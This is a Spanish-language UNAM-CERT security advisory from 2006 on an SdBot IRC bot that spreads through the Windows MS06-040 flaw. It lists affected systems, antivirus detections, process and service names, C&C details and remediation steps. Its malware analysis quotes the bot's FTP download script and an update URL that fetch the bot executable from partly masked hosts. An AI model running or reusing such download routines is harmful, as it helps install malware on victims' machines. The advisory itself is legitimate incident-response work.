Coordinación de Seguridad de la Información

Coordinación de Seguridad de la Información

Información y servicios de seguridad en cómputo

1 2 3 4 5 6 7

Vulnerabilidades rss pdf

Coordinación de Seguridad de la Información - UNAM-CERT -- DGTIC-UNAM

Nota de Seguridad UNAM-CERT-2006-002 Propagación de código malicioso que explota el Servicio de Servidor de Windows

El Departamento de Seguridad en Cómputo/UNAM-CERT ha atendido en la última semana un gran número de incidentes de seguridad relacionados con el sistema operativo Windows y que han sido causados por la infección de un código malicioso tipo bot que explota la vulnerabildiad en el Servicio de Servidor de Windows (MS06-040).

  • Fecha de Liberación: 7-Sep-2006
  • Ultima Revisión: 2-Oct-2006
  • Fuente: Departamento de Seguridad en Cómputo/UNAM-CERT
  • Riesgo Crítico
  • Problema de Vulnerabilidad Local y remoto
  • Tipo de Vulnerabilidad Ejecución remota de código y negación de servicio
  1. Sistemas afectados

    Los sistemas operativos que han presentado infección por parte del bot son los siguientes:

    • Windows NT 4.0
    • Windows 2000 Servive Pack 4
    • Windows XP Professional

    El 90% de los equipos reportados con este patrón de comportamiento a UNAM-CERT han sido Windows 2000 debido a que no presentan algún tipo de protección como un firewall personal, a diferencia de los sistemas XP que al tener instalado el Service Pack 2 habilitan de forma predeterminada el firewall de Windows.

    Se ha detectado que el bot toma ventaja de la vulnerabilidad en el Servicio de Servidor de Windows que soluciona el Boletín de Seguridad de Microsoft MS06-040 por lo que no se descarta que también los siguientes sistemas puedan estar en riesgo de ser infectados si no tienen esta actualización instalada:

    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Professional x64 Edition
    • Microsoft Windows Server 2003 y Microsoft Windows Server 2003 Service Pack 1
    • Microsoft Windows Server 2003 para sistemas con Itanium y Microsoft Windows Server 2003 con SP1 para sistemas con Itanium
  2. Descripción

    El Proyecto Honeynet del UNAM-CERT en los últimos días ha detectado un incremento en la actividad de malware por parte de direcciones IP localizadas en la red universitaria.

    El monitoreo de algunas porciones de la red permitió identificar un incremento en la actividad hacia el puerto 139/tcp, el cual es un puerto utilizado por el servicio de NetBios en sistemas operativos Windows.

    En días pasados se realizó la captura de una nueva muestra de malware que se empieza a propagar rápidamente, infectando a varios equipos Windows en poco tiempo.

    El análisis de la muestra de malware realizado tanto por el equipo de Malware y Honeynet del UNAM-CERT dictaminó que se trata de un bot que permite el control remoto de equipos vulnerados para los fines que el intruso decida.


    Análisis del bot

    Éste código malicioso ya es detectado por distintas firmas antivirus como se puede ver a continuación:

    AntivirusNombre
    AntiVirWorm/Sdbot.65963.1
    AuthentiumW32/Sdbot.UJO
    AVGIRC/BackDoor.SdBot2.HNO
    DrWebBackDoor.IRC.Sdbot.792
    EwidoBackdoor.SdBot.atz
    KasperskyBackdoor.Win32.SdBot.atz
    NOD32v2Variante de IRC/SdBot
    SymantecW32.Spybot.Worm
    UNABackdoor.SdBot.2
    VBA32Backdoor.Win32.SdBot.atz

    Algunos nombres de los procesos con los que el bot se ejecuta en los sistemas son:

    • smss.exe
    • register.exe

    Los archivos ejecutables de estos procesos maliciosos usualmente están alojados en el directorio C:\Winnt (Windows NT y Windows 2000) y C:\Windows (Windows XP y Windows Sever 2003).

    Es importante señalar que el código malicioso se instala en el sistema como un servicio propio de Windows para que se inicie junto con el sistema operativo. Por ejemplo, para el caso del ejecutable smss.exe se instalará un servicio con el nombre de Windows NT Session Managers y para el ejecutable register.exe se instalará un servicio con el nombre Windows Register Control. Estos servicios pueden ser visualizados a través de la consola Servicios de Windows. Cabe señalar que el nombre de los servicios puede variar dependiendo de la variante del bot.

    El análisis también reveló que existe un archivo con nombre i (sin extensión) en el directorio C:\Winnt\system32 que contiene una rutina para descargar el ejecutable del bot como se muestra a continuación:

    open 132.248.X.X 25869
    user 1 1
    get setup_21262.exe
    quit


    Rutina de ejecución del bot

    El bot se conecta a un servidor IRC con el nombre de dominio mail2.tiktikz.com que resuelve al siguiente sitio:

    AS | IP | CC | AS Name
    9844 | 61.97.152.3 | KR | HANINTERNET-AS HaninterNetworks

    De acuedo a diversos analisis del equipo UNAM-CERT el bot se conecta por el puerto 9632 y es importante denotar que se conecta a un canal llamado #edu, al parecer es un canal dedicado para equipos localizados en instituciones académicas, el bot se actualiza descargando un malware del sitio http://140.127.X.X/xsetup.exe, y se le ordena escanear el segmento /24 en el cual se encuentra el equipo utilizando los puertos 135/tcp NetBIOS, 139/tcp NetBIOS, 445/tcp NetBios y 1433/tcp MSQL Server.

  3. Impacto

    Un equipo vulnerable puede sufrir una negación de servicio al consumir el bot todos los recursos del sistema y provocar un ataque de negación de servicio en la red al ejecutar su rutina de infección (escaneos) contra otros sistemas.

  4. Solución

    • Actualizar el sistema operativo Windows
    • El bot toma ventajas de la vulnerabilidad en el Servicio de Servidor de Windows que fue cubierta por el Boletín de Seguridad de Microsoft MS06-040 liberado en Agosto pasado además de otras vulnerabilidades anteriores entre las que se encuentran:

      Debido a lo anteriormente mencionado es recomendable instalar a la brevedad todas las actualizaciones de seguridad liberadas hasta hoy en día.

      Es indispensable que el equipo cuente con el último Service Pack liberado para el sistema operativo en cuestión y todos los hotfixes liberados después de éste Service Pack.

    • Instalar y administrar un software antivirus
    • Es necesario instalar, actualizar y ejecutar algún tipo de software antivirus. Algunos de los software antivirus removerán o pondrán el cuarentena el proceso del bot.

      Se debe establecer el software antivirus de tal forma que se ejecute un escaneo completo del equipo de forma periódica.

    • Implementar un firewall personal
    • En los sistemas Windows NT y Windows 2000 es indispensable instalar y configurar un firewall personal que les permita estar protegidos contra éste tipo de amenazas.

      En el mercado existe una gran variedad de distribuidores de firewalls personales. Algunos de los más importantes son los siguientes:

  5. Referencias

La Coordinación de Seguridad de la Información/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:

  • Luis Fernando Fuentes Serrano (lfuentes at seguridad dot unam dot mx)
  • David Jiménez Domínguez (djimenez at correo dot seguridad dot unam dot mx)
  • Sergio Alavez Miguel (salavez at seguridad dot unam dot mx)
  • Juan Lopez Morales (jlopez at seguridad dot unam dot mx)
  • Jesús Ramón Jiménez Rojas (jrojas at seguridad dot unam dot mx)
  • Christian Calderon Hernádez (ccalderon at seguridad dot unam dot mx)
  • Ruben Aquino Luna (raquino at seguridad dot unam dot mx)

UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
Coordinación de Seguridad de la Información

incidentes at seguridad.unam.mx
phishing at seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel: 56 22 81 69
Fax: 56 22 80 47


Universidad Nacional Autonoma de México AENOR LOGO FIRST LOGO Aviso legal |  Créditos |  Staff |  Acerca |  Contacto |  FTP |  Administración
Copyright © Todos los derechos reservados
UNAM - CERT